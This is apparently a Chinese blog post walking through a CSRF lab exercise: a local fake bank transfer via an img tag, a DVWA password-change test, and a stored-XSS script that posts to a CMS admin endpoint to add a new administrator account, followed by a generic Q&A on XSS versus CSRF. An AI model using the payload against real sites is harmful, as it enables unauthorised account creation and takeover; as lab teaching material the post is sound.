Exercise:1.CSRF漏洞场景复现 2.场景测试 3.CSRF与XSS 相结合

目录

1. CSRF 漏洞场景复现

2. CSRF 漏洞验证

3. CSRF 与XSS 相结合


1. CSRF 漏洞场景复现

1.BANK转账实验网站搭建

mysql -uroot -proot
show databases;
create database bank;
show databases;
use bank;
source C:\\phpStudy\\WWW\\bank\\bank.sql;
show tables;
select * from member;   //查看表信息

查询结果:

 | id | name | password | money |

 | 1 | admin | e10adc3949ba59abbe56e057f20f883e | 70499 |

 | 2 | hello | e10adc3949ba59abbe56e057f20f883e | 1027009 |

 | 4 | test | e10adc3949ba59abbe56e057f20f883e | 1000700 |

 | 5 | Along | e10adc3949ba59abbe56e057f20f883e | 999499 |

 | 6 | hacker | e10adc3949ba59abbe56e057f20f883e | 1002000 |

update member set money=0 where id=6;  //更改id=6的money值=0

2.CSRF场景测试:

在未退出登录时访问危险网站

可以发现hello在访问危险网站时有100转入到hacker名下

 

  • 攻击者通过 <img> 标签构造GET 请求。

  • 浏览器根据 <img> 标签中的 SRC 属性,请求服务器资源,会自动带上身份认证信息。

 

 

3.CRSF攻击过程:


2. CSRF 漏洞验证

1) 以DVWA 为例子

  • 思路:用bp生成恶意网页,访问后自动提交更改密码,验证CSRF漏洞存在

1.首先找到漏洞点

2.使用BP修改密码

 

3.验证成功

在未退出登录的前提下访问上述链接即可直接登入,由此说明存在CSRF漏洞

 

3. CSRF 与XSS 相结合

1.创建网站后台管理员账密进行抓包分析

 

 

2.构造恶意代码

攻击者可以利用XSS 触发CSRF 攻击。因为,可以利用JS 发送HTTP 请求。经过研究受害网站的业务流程,可以构造如下代码:

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://192.168.5.140/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=lay&password=123123&password2=123123&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7
&userid=0");
</script>

3.将恶意代码写入留言板

 

4. 成功登录后台

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: XSS漏洞CSRF漏洞都是Web应用程序中常见的安全漏洞,但它们的攻击方式和影响范围有所不同。 相同点: 1. 都是Web应用程序的安全漏洞。 2. 都可以通过恶意构造的请求来实现攻击。 3. 都可以利用受害者已登录的身份进行攻击。 4. 都可以导致用户数据泄露、篡改或者账号被盗等风险。 不同点: 1. 攻击方式不同:XSS漏洞是通过在网页中注入恶意脚本来实现攻击,而CSRF漏洞则是通过伪造请求来实现攻击。 2. 影响范围不同:XSS漏洞主要会针对受害者的浏览器进行攻击,而CSRF漏洞则主要攻击Web应用程序后台。 3. 防御方式不同:防御XSS漏洞需要对用户输入进行过滤和转义,防御CSRF漏洞需要在服务端验证请求来源和用户身份。 总之,XSS漏洞CSRF漏洞都是比较常见的Web应用程序安全漏洞,开发者需要加强对这些漏洞的了解,采取有效的安全防护措施来保障Web应用程序的安全。 ### 回答2: XSS漏洞(跨站点脚本漏洞)和CSRF漏洞(跨站点请求伪造漏洞)是常见的网络安全问题,两者有一些不同点和相同点。 不同点: 1. 定义:XSS漏洞是指攻击者通过注入恶意脚本代码来篡改目标网页内容,从而获取用户敏感信息或执行恶意操作;而CSRF漏洞是攻击者通过伪造请求,利用受害者在目标网站中的有效会话执行非预期的操作。 2. 目标:XSS漏洞的目标是窃取用户信息、劫持会话等;而CSRF漏洞的目标是在受信任的用户执行恶意操作。 3. 注入位置:XSS漏洞注入恶意脚本通常发生在目标网页的输入控件、URL参数等位置;而CSRF漏洞则是通过在第三方网站或恶意邮件中引导用户点击恶意链接触发。 4. 影响范围:XSS漏洞的影响范围主要限于与受攻击网页有交互的用户;而CSRF漏洞对受害者的影响范围更广,因为攻击者可以通过恶意链接或页面在用户不知情的情况下执行操作。 相同点: 1. 都是跨站点攻击漏洞:两种漏洞都利用了缺乏有效的身份验证和授权机制的网站之间的信任关系。 2. 都利用Web应用程序的漏洞XSSCSRF漏洞都通过发现和利用Web应用程序的弱点来进行攻击。 3. 都对用户隐私和安全构成潜在威胁:XSS漏洞可以导致用户敏感信息的泄露或会话劫持,而CSRF漏洞可以使受害者在不知情的情况下执行非预期操作。 4. 都需要合适的预防措施:为了防止XSSCSRF漏洞的攻击,开发人员需要进行输入验证和过滤、正确的编码方式、实施有效的反CSRF令牌等安全措施。 综上所述,XSS漏洞CSRF漏洞是不同类型的跨站点攻击漏洞,但同样是Web应用程序安全的重要威胁。开发人员需要通过适当的预防措施来减少这些漏洞的风险,确保用户信息和系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值